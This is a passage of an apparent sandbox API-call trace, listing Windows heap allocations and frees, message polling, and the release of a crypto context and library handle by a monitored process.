hHeap=0x970000) returned 1 [0189.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0189.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0189.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0189.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0189.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0189.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0189.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0189.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0189.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0189.723] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.724] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0189.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0189.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.724] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.724] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0189.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0189.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0189.724] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0189.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0189.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0189.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0189.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0189.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0189.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0189.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0189.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0189.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0189.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0189.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0189.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0189.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0189.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0189.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0189.725] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0189.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0189.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0189.725] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.725] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0189.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0189.725] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0189.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0189.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0189.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0189.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0189.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0189.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.725] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.725] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0189.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0189.726] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0189.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0189.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0189.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0189.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0189.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0189.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0189.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0189.726] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0189.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0189.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.726] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0189.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0189.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0189.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0189.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0189.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0189.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0189.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.737] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0189.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0189.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0189.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0189.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0189.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0189.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0189.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0189.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0189.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0189.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0189.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0189.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0189.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69b08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0189.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0189.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0189.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0189.738] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0189.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0189.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0189.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0189.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0189.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0189.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0189.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0189.739] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0189.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0189.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0189.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0189.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0189.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0189.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0189.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0189.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0189.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0189.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0189.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0189.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0189.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0189.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0189.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0189.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0189.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0189.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0189.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0189.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0189.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0189.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0189.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0189.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0189.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0189.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0189.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0189.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0189.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0189.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0189.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0189.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0189.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0189.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0189.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0189.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0189.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0189.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0189.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0189.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0189.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0189.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0189.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0189.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0189.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0189.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0189.741] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0189.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0189.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0189.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0189.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0189.741] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0189.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0189.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0189.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0189.741] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0189.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0189.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0189.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0189.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0189.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0189.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.742] FreeLibrary (hLibModule=0x756e0000) returned 1 [0189.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0189.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0189.742] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0189.742] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0189.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0189.742] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0189.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0189.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0189.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0189.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0189.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0189.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0189.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0189.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0189.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0189.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0189.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0189.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0189.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0189.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0189.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0189.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0189.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0189.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0189.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.743] CloseHandle (hObject=0x2a0) returned 1 [0189.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0189.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0189.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0189.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0189.744] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0189.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0189.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0189.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0189.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0189.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0189.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0189.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0189.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0189.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0189.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0189.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0189.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0189.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0189.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0189.745] CloseHandle (hObject=0x2d0) returned 1 [0189.798] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0189.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0189.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0189.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0189.800] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0189.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0189.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0189.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 